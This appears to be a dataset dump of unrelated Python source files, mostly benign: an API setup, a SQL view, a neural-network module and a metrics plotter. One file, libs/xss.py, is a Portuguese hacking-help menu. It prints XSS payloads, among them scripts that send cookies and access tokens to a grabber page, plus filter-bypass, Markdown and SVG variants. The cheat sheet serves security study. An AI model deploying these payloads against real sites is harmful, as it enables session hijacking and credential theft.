print(line)
| line = '-'*39
blank = '|' + ' '*37 + '|'
blankRoberto = '|' + ' '*8 + 'Roberto' + ' '*22 + '|'
blankNum = '|' + ' '*8 + '5786' + ' '*25 + '|'
blankUNIFEI = '|' + ' '*8 + 'UNIFEI' + ' '*23 + '|'
print(line)
print(blankRoberto)
print(blank)
print(blankNum)
print(blank)
print(blankUNIFEI)
print(line) | none | 1 | 2.659225 | 3 | |
ads/rest/__init__.py | MagnumOpuses/jobscanner.backend | 0 | 6623936 | from flask_restplus import Api, Namespace
api = Api(version='1.0', title='Backend Service for JobScanner',
description='Serving JobScanner',
default='Jobscanner Backend',
default_label="An API for searching and retrieving job ads.")
ns_alljobs = Namespace('All job ads',
description='Finding the majority of Job ads')
ns_skillsandtraits = Namespace('Skills and Traits',
description='Find all Skills and traits per occupation')
ns_jobgeolocation = Namespace('Job location for a specific job',
description='Generate job location for a specific job')
ns_jobgeocount = Namespace('Job count per kommun or lan',
description='Job count per kommun or lan for a specific job')
api.add_namespace(ns_alljobs, '/')
api.add_namespace(ns_skillsandtraits, '/')
api.add_namespace(ns_jobgeolocation, '/job-geolocation')
api.add_namespace(ns_jobgeocount, '/job-geocount')
| from flask_restplus import Api, Namespace
api = Api(version='1.0', title='Backend Service for JobScanner',
description='Serving JobScanner',
default='Jobscanner Backend',
default_label="An API for searching and retrieving job ads.")
ns_alljobs = Namespace('All job ads',
description='Finding the majority of Job ads')
ns_skillsandtraits = Namespace('Skills and Traits',
description='Find all Skills and traits per occupation')
ns_jobgeolocation = Namespace('Job location for a specific job',
description='Generate job location for a specific job')
ns_jobgeocount = Namespace('Job count per kommun or lan',
description='Job count per kommun or lan for a specific job')
api.add_namespace(ns_alljobs, '/')
api.add_namespace(ns_skillsandtraits, '/')
api.add_namespace(ns_jobgeolocation, '/job-geolocation')
api.add_namespace(ns_jobgeocount, '/job-geocount')
| none | 1 | 2.301912 | 2 | |
musicpro/views/reporteriaVentas.py | Felipeplz/MusicPro | 0 | 6623937 | from .conn import *
def viewVentas(request, **kwargs):
id = kwargs.get("id")
result = Conectar().execute("SELECT *"
"FROM [dbo].[VENTA]"
"ORDER BY id_venta ASC").fetchall()
return render(request, 'reporteriaVentas.html', {'SQLVentas':result}) | from .conn import *
def viewVentas(request, **kwargs):
id = kwargs.get("id")
result = Conectar().execute("SELECT *"
"FROM [dbo].[VENTA]"
"ORDER BY id_venta ASC").fetchall()
return render(request, 'reporteriaVentas.html', {'SQLVentas':result}) | none | 1 | 1.980076 | 2 | |
bronze/linear_evolve.py | HasanIjaz-HB/Quantum-Computing | 0 | 6623938 | <reponame>HasanIjaz-HB/Quantum-Computing
def linear_evolve(A,v):
| def linear_evolve(A,v): | none | 1 | 1.073046 | 1 | |
stereo/image/segmentation/seg_utils/models/SE_weight_module.py | nilsmechtel/stereopy | 120 | 6623939 | <reponame>nilsmechtel/stereopy
import torch.nn as nn
class SEWeightModule(nn.Module):
def __init__(self, channels, reduction=16):
super(SEWeightModule, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Conv2d(channels, channels//reduction, kernel_size=1, padding=0)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Conv2d(channels//reduction, channels, kernel_size=1, padding=0)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
out = self.avg_pool(x)
out = self.fc1(out)
out = self.relu(out)
out = self.fc2(out)
weight = self.sigmoid(out)
return weight | import torch.nn as nn
class SEWeightModule(nn.Module):
def __init__(self, channels, reduction=16):
super(SEWeightModule, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Conv2d(channels, channels//reduction, kernel_size=1, padding=0)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Conv2d(channels//reduction, channels, kernel_size=1, padding=0)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
out = self.avg_pool(x)
out = self.fc1(out)
out = self.relu(out)
out = self.fc2(out)
weight = self.sigmoid(out)
return weight | none | 1 | 2.721358 | 3 | |
libs/xss.py | N3w-elf/Hacking_Help | 14 | 6623940 | <filename>libs/xss.py
# BIBLIOTESCAS
# =============================
from os import system
from time import sleep
# =============================
#
#
# Funçao do XSS
def fun_xss():
while True:
system('clear')
print("""
═╗ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗
╩ ╚═╚═╝╚═╝\n
- Os Ataques Cross-site Scripting (Xss) São Um Tipo De Injeção, Na Qual Scripts Maliciosos São Injetados Em Sites Benignos E Confiáveis. Os Ataques Xss Ocorrem Quando Um Invasor Usa Um Aplicativo Da Web Para Enviar Código Malicioso, Geralmente Na Forma De Um Script Do Lado Do Navegador, Para Um Usuário Final Diferente.
As Falhas Que Permitem Que Esses Ataques Sejam Bem-sucedidos São Bastante Difundidas E Ocorrem Em Qualquer Lugar Em Que Um Aplicativo Da Web Usa A Entrada De Um Usuário Na Saída Que Gera Sem Validá-la Ou Codificá-la.\n
[01] - Agarrador De Dados Para Xss
[02] - Xss Em Html/aplicativos
[03] - Xss Em Markdown
[04] - Xss Em Svg(Curto)
[05] - Ignorar Lista Negra De Palavras Com Avaliação De Código
[06] - Menu
[99] - Sair
""")
cmd = str(input("===> "))
if cmd == '1':
system('clear')
print("""
╔═╗╔═╗╔═╗╦═╗╦═╗╔═╗╔╦╗╔═╗╦═╗ ╔╦╗╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔═╗ ╔═╗╔═╗╦═╗╔═╗ ═╗ ╦╔═╗╔═╗
╠═╣║ ╦╠═╣╠╦╝╠╦╝╠═╣ ║║║ ║╠╦╝ ║║║╣ ║║╠═╣ ║║║ ║╚═╗ ╠═╝╠═╣╠╦╝╠═╣ ╔╩╦╝╚═╗╚═╗
╩ ╩╚═╝╩ ╩╩╚═╩╚═╩ ╩═╩╝╚═╝╩╚═ ═╩╝╚═╝ ═╩╝╩ ╩═╩╝╚═╝╚═╝ ╩ ╩ ╩╩╚═╩ ╩ ╩ ╚═╚═╝╚═╝\n
- Obtém O Cookie Do Administrador Ou Token De Acesso Confidencial, A Seguinte Carga O Enviará Para Uma Página Controlada.
> <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
> <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
> <script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
> <script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '2':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╦ ╦╔╦╗╔╦╗╦ ╔═╗ ╔═╗╔═╗╦ ╦╔═╗╔═╗╔╦╗╦╦ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╠═╣ ║ ║║║║ ║╣ ╠═╣╠═╝║ ║║ ╠═╣ ║ ║╚╗╔╝║ ║╚═╗
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩ ╩ ╩ ╩╩═╝ ╚═╝ ╩ ╩╩ ╩═╝╩╚═╝╩ ╩ ╩ ╩ ╚╝ ╚═╝╚═╝ \n
> <script>alert('XSS')</script>
> <scr<script>ipt>alert('XSS')</scr<script>ipt>
> "><script>alert("XSS")</script>
> "><script>alert(String.fromCharCode(88,83,83))</script>
> <img src=x onerror=alert('XSS');>
> <img src=x onerror=alert('XSS')//
> <img src=x onerror=alert(String.fromCharCode(88,83,83));>
> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
> <img src=x:alert(alt) onerror=eval(src) alt=xss>
> "><img src=x onerror=alert("XSS");>
> "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '3':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔╦╗╔═╗╦═╗╦╔═╔╦╗╔═╗╦ ╦╔╗╔
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ║║║╠═╣╠╦╝╠╩╗ ║║║ ║║║║║║║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩╩ ╩╩╚═╩ ╩═╩╝╚═╝╚╩╝╝╚╝ \n
> [a](javascript:prompt(document.cookie))
> [a](j a v a s c r i p t:prompt(document.cookie))
> [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
> [a](javascript:window.onerror=alert;throw%201)
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '4':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔═╗╦ ╦╔═╗ ╔═╗╦ ╦╦═╗╔╦╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╚═╗╚╗╔╝║ ╦ ║ ║ ║╠╦╝ ║ ║ ║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╚═╝ ╚╝ ╚═╝ ╚═╝╚═╝╩╚═ ╩ ╚═╝\n
> <svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '5':
system('clear')
print("""
╦╔═╗╔╗╔╔═╗╦═╗╔═╗╦═╗ ╦ ╦╔═╗╔╦╗╔═╗ ╔╗╔╔═╗╔═╗╦═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╦ ╔═╗╦ ╦╦═╗╔═╗╔═╗ ╔═╗╔═╗╔╦╗ ╔═╗╦ ╦╔═╗╦ ╦╔═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔╦╗╦╔═╗╔═╗
║║ ╦║║║║ ║╠╦╝╠═╣╠╦╝ ║ ║╚═╗ ║ ╠═╣ ║║║║╣ ║ ╦╠╦╝╠═╣ ║║║╣ ╠═╝╠═╣║ ╠═╣╚╗╔╝╠╦╝╠═╣╚═╗ ║ ║ ║║║║ ╠═╣╚╗╔╝╠═╣║ ║╠═╣║ ║ ║║║╣ ║ ║║║║ ╦║ ║
╩╚═╝╝╚╝╚═╝╩╚═╩ ╩╩╚═ ╩═╝╩╚═╝ ╩ ╩ ╩ ╝╚╝╚═╝╚═╝╩╚═╩ ╩ ═╩╝╚═╝ ╩ ╩ ╩╩═╝╩ ╩ ╚╝ ╩╚═╩ ╩╚═╝ ╚═╝╚═╝╩ ╩ ╩ ╩ ╚╝ ╩ ╩╩═╝╩╩ ╩╚═╝ ═╩╝╚═╝ ╚═╝═╩╝╩╚═╝╚═╝\n
> eval('ale'+'rt(0)');
> Function('ale'+'rt(1)')();
> new Function`alert`6``;
> setTimeout('ale'+'rt(2)');
> setInterval('ale'+'rt(10)');
> Set.constructor('ale'+'rt(13)')();
> Set.constructor`alert(14)```;
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '6':
break
elif cmd == '99':
print("Até logo...")
exit()
else:
print("Comando Inválido!!!")
sleep(2)
| <filename>libs/xss.py
# BIBLIOTESCAS
# =============================
from os import system
from time import sleep
# =============================
#
#
# Funçao do XSS
def fun_xss():
while True:
system('clear')
print("""
═╗ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗
╩ ╚═╚═╝╚═╝\n
- Os Ataques Cross-site Scripting (Xss) São Um Tipo De Injeção, Na Qual Scripts Maliciosos São Injetados Em Sites Benignos E Confiáveis. Os Ataques Xss Ocorrem Quando Um Invasor Usa Um Aplicativo Da Web Para Enviar Código Malicioso, Geralmente Na Forma De Um Script Do Lado Do Navegador, Para Um Usuário Final Diferente.
As Falhas Que Permitem Que Esses Ataques Sejam Bem-sucedidos São Bastante Difundidas E Ocorrem Em Qualquer Lugar Em Que Um Aplicativo Da Web Usa A Entrada De Um Usuário Na Saída Que Gera Sem Validá-la Ou Codificá-la.\n
[01] - Agarrador De Dados Para Xss
[02] - Xss Em Html/aplicativos
[03] - Xss Em Markdown
[04] - Xss Em Svg(Curto)
[05] - Ignorar Lista Negra De Palavras Com Avaliação De Código
[06] - Menu
[99] - Sair
""")
cmd = str(input("===> "))
if cmd == '1':
system('clear')
print("""
╔═╗╔═╗╔═╗╦═╗╦═╗╔═╗╔╦╗╔═╗╦═╗ ╔╦╗╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔═╗ ╔═╗╔═╗╦═╗╔═╗ ═╗ ╦╔═╗╔═╗
╠═╣║ ╦╠═╣╠╦╝╠╦╝╠═╣ ║║║ ║╠╦╝ ║║║╣ ║║╠═╣ ║║║ ║╚═╗ ╠═╝╠═╣╠╦╝╠═╣ ╔╩╦╝╚═╗╚═╗
╩ ╩╚═╝╩ ╩╩╚═╩╚═╩ ╩═╩╝╚═╝╩╚═ ═╩╝╚═╝ ═╩╝╩ ╩═╩╝╚═╝╚═╝ ╩ ╩ ╩╩╚═╩ ╩ ╩ ╚═╚═╝╚═╝\n
- Obtém O Cookie Do Administrador Ou Token De Acesso Confidencial, A Seguinte Carga O Enviará Para Uma Página Controlada.
> <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
> <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
> <script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
> <script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '2':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╦ ╦╔╦╗╔╦╗╦ ╔═╗ ╔═╗╔═╗╦ ╦╔═╗╔═╗╔╦╗╦╦ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╠═╣ ║ ║║║║ ║╣ ╠═╣╠═╝║ ║║ ╠═╣ ║ ║╚╗╔╝║ ║╚═╗
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩ ╩ ╩ ╩╩═╝ ╚═╝ ╩ ╩╩ ╩═╝╩╚═╝╩ ╩ ╩ ╩ ╚╝ ╚═╝╚═╝ \n
> <script>alert('XSS')</script>
> <scr<script>ipt>alert('XSS')</scr<script>ipt>
> "><script>alert("XSS")</script>
> "><script>alert(String.fromCharCode(88,83,83))</script>
> <img src=x onerror=alert('XSS');>
> <img src=x onerror=alert('XSS')//
> <img src=x onerror=alert(String.fromCharCode(88,83,83));>
> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
> <img src=x:alert(alt) onerror=eval(src) alt=xss>
> "><img src=x onerror=alert("XSS");>
> "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '3':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔╦╗╔═╗╦═╗╦╔═╔╦╗╔═╗╦ ╦╔╗╔
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ║║║╠═╣╠╦╝╠╩╗ ║║║ ║║║║║║║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩╩ ╩╩╚═╩ ╩═╩╝╚═╝╚╩╝╝╚╝ \n
> [a](javascript:prompt(document.cookie))
> [a](j a v a s c r i p t:prompt(document.cookie))
> [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
> [a](javascript:window.onerror=alert;throw%201)
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '4':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔═╗╦ ╦╔═╗ ╔═╗╦ ╦╦═╗╔╦╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╚═╗╚╗╔╝║ ╦ ║ ║ ║╠╦╝ ║ ║ ║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╚═╝ ╚╝ ╚═╝ ╚═╝╚═╝╩╚═ ╩ ╚═╝\n
> <svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '5':
system('clear')
print("""
╦╔═╗╔╗╔╔═╗╦═╗╔═╗╦═╗ ╦ ╦╔═╗╔╦╗╔═╗ ╔╗╔╔═╗╔═╗╦═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╦ ╔═╗╦ ╦╦═╗╔═╗╔═╗ ╔═╗╔═╗╔╦╗ ╔═╗╦ ╦╔═╗╦ ╦╔═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔╦╗╦╔═╗╔═╗
║║ ╦║║║║ ║╠╦╝╠═╣╠╦╝ ║ ║╚═╗ ║ ╠═╣ ║║║║╣ ║ ╦╠╦╝╠═╣ ║║║╣ ╠═╝╠═╣║ ╠═╣╚╗╔╝╠╦╝╠═╣╚═╗ ║ ║ ║║║║ ╠═╣╚╗╔╝╠═╣║ ║╠═╣║ ║ ║║║╣ ║ ║║║║ ╦║ ║
╩╚═╝╝╚╝╚═╝╩╚═╩ ╩╩╚═ ╩═╝╩╚═╝ ╩ ╩ ╩ ╝╚╝╚═╝╚═╝╩╚═╩ ╩ ═╩╝╚═╝ ╩ ╩ ╩╩═╝╩ ╩ ╚╝ ╩╚═╩ ╩╚═╝ ╚═╝╚═╝╩ ╩ ╩ ╩ ╚╝ ╩ ╩╩═╝╩╩ ╩╚═╝ ═╩╝╚═╝ ╚═╝═╩╝╩╚═╝╚═╝\n
> eval('ale'+'rt(0)');
> Function('ale'+'rt(1)')();
> new Function`alert`6``;
> setTimeout('ale'+'rt(2)');
> setInterval('ale'+'rt(10)');
> Set.constructor('ale'+'rt(13)')();
> Set.constructor`alert(14)```;
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '6':
break
elif cmd == '99':
print("Até logo...")
exit()
else:
print("Comando Inválido!!!")
sleep(2)
| pt | 0.264971 | # BIBLIOTESCAS # ============================= # ============================= # # # Funçao do XSS ═╗ ╦╔═╗╔═╗ ╔╩╦╝╚═╗╚═╗ ╩ ╚═╚═╝╚═╝\n - Os Ataques Cross-site Scripting (Xss) São Um Tipo De Injeção, Na Qual Scripts Maliciosos São Injetados Em Sites Benignos E Confiáveis. Os Ataques Xss Ocorrem Quando Um Invasor Usa Um Aplicativo Da Web Para Enviar Código Malicioso, Geralmente Na Forma De Um Script Do Lado Do Navegador, Para Um Usuário Final Diferente. As Falhas Que Permitem Que Esses Ataques Sejam Bem-sucedidos São Bastante Difundidas E Ocorrem Em Qualquer Lugar Em Que Um Aplicativo Da Web Usa A Entrada De Um Usuário Na Saída Que Gera Sem Validá-la Ou Codificá-la.\n [01] - Agarrador De Dados Para Xss [02] - Xss Em Html/aplicativos [03] - Xss Em Markdown [04] - Xss Em Svg(Curto) [05] - Ignorar Lista Negra De Palavras Com Avaliação De Código [06] - Menu [99] - Sair ╔═╗╔═╗╔═╗╦═╗╦═╗╔═╗╔╦╗╔═╗╦═╗ ╔╦╗╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔═╗ ╔═╗╔═╗╦═╗╔═╗ ═╗ ╦╔═╗╔═╗ ╠═╣║ ╦╠═╣╠╦╝╠╦╝╠═╣ ║║║ ║╠╦╝ ║║║╣ ║║╠═╣ ║║║ ║╚═╗ ╠═╝╠═╣╠╦╝╠═╣ ╔╩╦╝╚═╗╚═╗ ╩ ╩╚═╝╩ ╩╩╚═╩╚═╩ ╩═╩╝╚═╝╩╚═ ═╩╝╚═╝ ═╩╝╩ ╩═╩╝╚═╝╚═╝ ╩ ╩ ╩╩╚═╩ ╩ ╩ ╚═╚═╝╚═╝\n - Obtém O Cookie Do Administrador Ou Token De Acesso Confidencial, A Seguinte Carga O Enviará Para Uma Página Controlada. 
> <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script> > <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script> > <script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script> > <script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script> ═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╦ ╦╔╦╗╔╦╗╦ ╔═╗ ╔═╗╔═╗╦ ╦╔═╗╔═╗╔╦╗╦╦ ╦╔═╗╔═╗ ╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╠═╣ ║ ║║║║ ║╣ ╠═╣╠═╝║ ║║ ╠═╣ ║ ║╚╗╔╝║ ║╚═╗ ╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩ ╩ ╩ ╩╩═╝ ╚═╝ ╩ ╩╩ ╩═╝╩╚═╝╩ ╩ ╩ ╩ ╚╝ ╚═╝╚═╝ \n > <script>alert('XSS')</script> > <scr<script>ipt>alert('XSS')</scr<script>ipt> > "><script>alert("XSS")</script> > "><script>alert(String.fromCharCode(88,83,83))</script> > <img src=x onerror=alert('XSS');> > <img src=x onerror=alert('XSS')// > <img src=x onerror=alert(String.fromCharCode(88,83,83));> > <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> > <img src=x:alert(alt) onerror=eval(src) alt=xss> > "><img src=x onerror=alert("XSS");> > "><img src=x onerror=alert(String.fromCharCode(88,83,83));> ═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔╦╗╔═╗╦═╗╦╔═╔╦╗╔═╗╦ ╦╔╗╔ ╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ║║║╠═╣╠╦╝╠╩╗ ║║║ ║║║║║║║ ╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩╩ ╩╩╚═╩ ╩═╩╝╚═╝╚╩╝╝╚╝ \n > [a](javascript:prompt(document.cookie)) > [a](j a v a s c r i p t:prompt(document.cookie)) > [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) > [a](javascript:window.onerror=alert;throw%201) ═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔═╗╦ ╦╔═╗ ╔═╗╦ ╦╦═╗╔╦╗╔═╗ ╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╚═╗╚╗╔╝║ ╦ ║ ║ ║╠╦╝ ║ ║ ║ ╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╚═╝ ╚╝ ╚═╝ ╚═╝╚═╝╩╚═ ╩ ╚═╝\n > <svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/> > <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg> > <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg> > <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg> ╦╔═╗╔╗╔╔═╗╦═╗╔═╗╦═╗ ╦ ╦╔═╗╔╦╗╔═╗ ╔╗╔╔═╗╔═╗╦═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╦ ╔═╗╦ ╦╦═╗╔═╗╔═╗ ╔═╗╔═╗╔╦╗ ╔═╗╦ ╦╔═╗╦ ╦╔═╗╔═╗ ╔╦╗╔═╗ 
╔═╗╔╦╗╦╔═╗╔═╗ ║║ ╦║║║║ ║╠╦╝╠═╣╠╦╝ ║ ║╚═╗ ║ ╠═╣ ║║║║╣ ║ ╦╠╦╝╠═╣ ║║║╣ ╠═╝╠═╣║ ╠═╣╚╗╔╝╠╦╝╠═╣╚═╗ ║ ║ ║║║║ ╠═╣╚╗╔╝╠═╣║ ║╠═╣║ ║ ║║║╣ ║ ║║║║ ╦║ ║ ╩╚═╝╝╚╝╚═╝╩╚═╩ ╩╩╚═ ╩═╝╩╚═╝ ╩ ╩ ╩ ╝╚╝╚═╝╚═╝╩╚═╩ ╩ ═╩╝╚═╝ ╩ ╩ ╩╩═╝╩ ╩ ╚╝ ╩╚═╩ ╩╚═╝ ╚═╝╚═╝╩ ╩ ╩ ╩ ╚╝ ╩ ╩╩═╝╩╩ ╩╚═╝ ═╩╝╚═╝ ╚═╝═╩╝╩╚═╝╚═╝\n > eval('ale'+'rt(0)'); > Function('ale'+'rt(1)')(); > new Function`alert`6``; > setTimeout('ale'+'rt(2)'); > setInterval('ale'+'rt(10)'); > Set.constructor('ale'+'rt(13)')(); > Set.constructor`alert(14)```; | 3.370845 | 3 |
gamechangerml/src/search/evaluation/plotter.py | ekmixon/gamechanger-ml | 11 | 6623941 | <reponame>ekmixon/gamechanger-ml
import os
import json
import matplotlib.pyplot as plt
import logging
import argparse
logger = logging.getLogger(__name__)
def load_json(path):
"""
Load json file
Args:
path (str): Path to JSON file
Returns:
data (dict): Dictionary form of JSON file
"""
with open(path, "r") as fp:
data = json.load(fp)
return data
def load_all_metrics(data_path):
"""
Load all `metrics.json` files in a directory.
Args:
data_path (str): Path of folder directory containing all tests
Returns:
all_data (dict): Dictionary form containing all data of all metrics
"""
all_data = {}
for root, dirs, files in os.walk(data_path, topdown=True):
for name in files:
if name == "metrics.json":
file_path = os.path.join(root, name)
model_name = root.split("/")[-1]
all_data[model_name] = load_json(file_path)
return all_data
def generate_report(all_data, fname, metric):
"""
Generate a report from all_data given a
specific metric
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
metric (str): Metric name to evaluate in the metrics file
"""
plt.figure(figsize=(8, 6))
for model_name, data in all_data.items():
k_s = []
score = []
for key, value in data.items():
k_s.append(key)
score.append(value[metric])
plt.plot(k_s, score, label=model_name, marker=".")
plt.ylabel(metric.title())
plt.xlabel("k")
plt.title(f"{metric.title()} Scores")
plt.ylim((0.0, 1.0))
plt.grid()
plt.legend()
plt.savefig(fname)
def generate_mrr(all_data, fname):
"""
Generate an MRR report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8, 4))
models = []
scores = []
for model_name, data in sorted(all_data.items(), reverse = True):
models.append(model_name)
scores.append(data["10"]["mrr_at_k"])
plt.title("MRR Scores at k=10")
plt.xlim((0.0, 1.0))
plt.barh(range(len(scores)), scores)
plt.yticks(range(len(models)), models)
for model_name, score in zip(models, scores):
plt.annotate(round(score, 3), (score, models.index(model_name)-0.2))
plt.tight_layout()
plt.savefig(fname)
def generate_precision_recall(all_data, fname):
"""
Generate an precision and recall report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8,6))
models = []
precision_list = []
recall_list = []
for model_name, data in all_data.items():
models.append(model_name)
precision = []
recall = []
for key, value in data.items():
precision.append(value['precision'])
recall.append(value['recall'])
precision_list.append(precision)
recall_list.append(recall)
plt.plot(precision, recall, label = model_name)
plt.ylim(0, 1)
plt.xlim(0, 1)
plt.xlabel("Recall")
plt.ylabel("Precision")
plt.legend()
plt.grid()
plt.tight_layout()
plt.savefig(fname)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-e",
"--eval_path",
dest="evaluation_path",
required=True,
type=str,
help="Folder path to model predictions that have been evaluated",
)
args = parser.parse_args()
path = args.evaluation_path
all_data = load_all_metrics(path)
fname = f"{path}/precision.png"
generate_report(all_data, fname, "precision")
fname = f"{path}/recall.png"
generate_report(all_data, fname, "recall")
fname = f"{path}/mrr_line.png"
generate_report(all_data, fname, "mrr_at_k")
fname = f"{path}/mrr.png"
generate_mrr(all_data, fname)
fname = f"{path}/precision_recall.png"
generate_precision_recall(all_data, fname)
| import os
import json
import matplotlib.pyplot as plt
import logging
import argparse
logger = logging.getLogger(__name__)
def load_json(path):
"""
Load json file
Args:
path (str): Path to JSON file
Returns:
data (dict): Dictionary form of JSON file
"""
with open(path, "r") as fp:
data = json.load(fp)
return data
def load_all_metrics(data_path):
"""
Load all `metrics.json` files in a directory.
Args:
data_path (str): Path of folder directory containing all tests
Returns:
all_data (dict): Dictionary form containing all data of all metrics
"""
all_data = {}
for root, dirs, files in os.walk(data_path, topdown=True):
for name in files:
if name == "metrics.json":
file_path = os.path.join(root, name)
model_name = root.split("/")[-1]
all_data[model_name] = load_json(file_path)
return all_data
def generate_report(all_data, fname, metric):
"""
Generate a report from all_data given a
specific metric
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
metric (str): Metric name to evaluate in the metrics file
"""
plt.figure(figsize=(8, 6))
for model_name, data in all_data.items():
k_s = []
score = []
for key, value in data.items():
k_s.append(key)
score.append(value[metric])
plt.plot(k_s, score, label=model_name, marker=".")
plt.ylabel(metric.title())
plt.xlabel("k")
plt.title(f"{metric.title()} Scores")
plt.ylim((0.0, 1.0))
plt.grid()
plt.legend()
plt.savefig(fname)
def generate_mrr(all_data, fname):
"""
Generate an MRR report from all_data
Args:
all_data (dict): Dictionary of all metrics from a directory
containing all of the tests
fname (str): Filename to save the report graph
"""
plt.figure(figsize=(8, 4))
models = []
scores = []
for model_name, data in sorted(all_data.items(), reverse = True):
models.append(model_name)
scores.append(data["10"]["mrr_at_k"])
plt.title("MRR Scores at k=10")
plt.xlim((0.0, 1.0))
plt.barh(range(len(scores)), scores)
plt.yticks(range(len(models)), models)
for model_name, score in zip(models, scores):
plt.annotate(round(score, 3), (score, models.index(model_name)-0.2))
plt.tight_layout()
plt.savefig(fname)
